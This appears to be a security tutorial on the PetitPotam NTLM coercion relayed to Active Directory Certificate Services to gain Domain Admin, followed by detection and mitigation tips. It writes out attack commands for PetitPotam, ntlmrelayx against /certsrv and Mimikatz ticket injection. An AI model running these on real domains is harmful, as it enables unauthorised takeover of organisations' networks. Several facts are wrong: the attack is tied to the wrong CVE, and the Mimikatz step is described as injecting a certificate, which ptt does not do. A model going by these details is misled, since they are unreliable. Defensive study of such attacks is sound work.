PetitPotam Overview#

PetitPotam exploits the Microsoft Encrypting File System Remote Protocol (MS-EFSRPC), which is used for file encryption and decryption on Windows machines. This protocol can be abused to force a machine to authenticate via NTLM and can lead to NTLM relay attacks when the MS-EFSRPC service is misconfigured.

ADCS Overview#

Active Directory Certificate Services (ADCS) is a service that allows an organization to issue public key certificates for users, devices, and services within a Windows domain. If ADCS is improperly configured, an attacker can request certificates they are not authorized for, enabling them to impersonate high-privilege accounts like Domain Admins.

**2. Exploitation Mechanism**#

PetitPotam Tool: Abusing MS-EFSRPC for NTLM Authentication Relay#

1. PetitPotam abuses the MS-EFSRPC protocol by forcing a vulnerable domain controller (DC) or Windows machine to authenticate using NTLM authentication. The tool makes the target system request NTLM authentication, which can then be intercepted and relayed.
2. The attacker uses a tool like Impacket’s ntlmrelayx.py to relay the NTLM hash to an Active Directory Certificate Services (ADCS) server.
3. ADCS can be misconfigured in such a way that it issues certificates to unauthorized users. By relaying the NTLM authentication to the ADCS server, the attacker can impersonate Domain Admins.

3. Step-by-Step Exploitation of CVE-2021-26414#

Step 1: Attacker’s Setup#

The attacker needs a low-privileged user account within the domain, and the target system (usually the Domain Controller or a machine communicating with ADCS) must have the MS-EFSRPC service running and vulnerable to the PetitPotam attack.

Step 2: Triggering MS-EFSRPC Authentication#

The PetitPotam tool will exploit the MS-EFSRPC vulnerability to trigger NTLM authentication. PetitPotam forces the target system to authenticate with NTLM, making it vulnerable to relay attacks.

**Command to Run PetitPotam**:#

# Running PetitPotam tool to trigger NTLM authentication relay
python3 petitpotam.py <target-dc-ip> <attacker-ip>

• : IP address of the Domain Controller or the vulnerable system.
• : IP address of the attacker’s machine.

This sends an NTLM authentication request to the attacker’s machine.

Step 3: Relay NTLM Authentication to ADCS Server#

Once the NTLM request is triggered, the attacker can use Impacket’s ntlmrelayx.py to relay the authentication to the ADCS server.

Impacket Relay Command:#

Use ntlmrelayx to relay NTLM authentication to ADCS server

python3 [ntlmrelayx.py](http://ntlmrelayx.py/) -t http://<adcs-server>/certsrv

• : The IP address or hostname of the ADCS server.

This step relays the NTLM hash from the DC to the ADCS server, where the attacker can request a certificate.

Step 4: Request Certificate with Relayed NTLM Authentication#

By exploiting the NTLM relay, the attacker gets a certificate from the ADCS server that can be used to impersonate a Domain Admin.

If ADCS is improperly configured and doesn’t restrict certificate requests, the attacker can request a certificate for any privileged account (like Domain Admin).

Post-Exploitation: Impersonating Domain Admin#

Once the attacker receives the privileged certificate, they can use tools like Mimikatz to inject it into their Kerberos ticket cache.

Mimikatz Command to Inject Certificate:#

# Inject the certificate into the Kerberos ticket cache
mimikatz.exe "kerberos::ptt <certificate-file>"

This allows the attacker to authenticate as the Domain Admin and gain Domain Admin privileges.

5. Detection and Mitigation#

Detection#

1. Event Logs (Event ID 4648):
   • When an NTLM authentication request is made with explicit credentials, Event ID 4648 is generated. This event can help identify unauthorized NTLM authentication attempts.
2. Network Traffic Monitoring:
   • Watch for unusual RPC or SMB traffic patterns. This is particularly important to detect NTLM relay attempts and PetitPotam abuse.
3. Monitoring Certificate Requests:
   • Monitor certificate requests from machines that are not authorized to request privileged certificates. ADCS logging can help identify when unauthorized certificate requests are made.
4. SMB and RPC Anomalies:
   • Look for anomalies in SMB or RPC traffic, especially NTLM authentication relays that target ADCS servers.

Mitigation#

1. Apply Microsoft’s March 2022 Patch:
   • Microsoft released a patch to fix CVE-2021-26414. Ensure that the patch is applied to all Windows servers running MS-EFSRPC and ADCS.
2. Disable MS-EFSRPC if Not Required:
   • If MS-EFSRPC is not needed for your environment, disable the service to prevent exploitation.
3. Restrict Access to ADCS:
   • Limit who can request certificates from the ADCS server by applying proper role-based access control. Ensure that only authorized accounts (e.g., Domain Admins) can request certificates.
4. Force SMB Signing:
   • SMB signing ensures that SMB traffic cannot be intercepted or modified, which helps prevent NTLM relay attacks.
5. Enforce NTLMv2:
   • Disable NTLMv1 and enforce NTLMv2 in your domain to mitigate relay attacks that rely on NTLM.
6. Audit and Restrict SMB Permissions:
   • Audit and restrict SMB shares to prevent unauthorized access. SMB permissions should be tightly controlled.

6. Conclusion and Key Takeaways#

CVE-2021-26414 (PetitPotam + ADCS) is a serious privilege escalation vulnerability in Windows domains. By exploiting the MS-EFSRPC protocol via PetitPotam and relaying the NTLM authentication to a misconfigured ADCS server, attackers can obtain Domain Admin privileges.

To prevent such attacks, organizations should apply patches, disable unnecessary services, and carefully audit their Active Directory environments for misconfigurations. Monitoring network traffic and event logs for signs of exploitation is crucial for early detection.

**References for Further Reading**#

• Microsoft Security Advisory CVE-2021-26414
• PetitPotam Tool (GitHub)
• Impacket NTLM Relay (GitHub)
• Mimikatz GitHub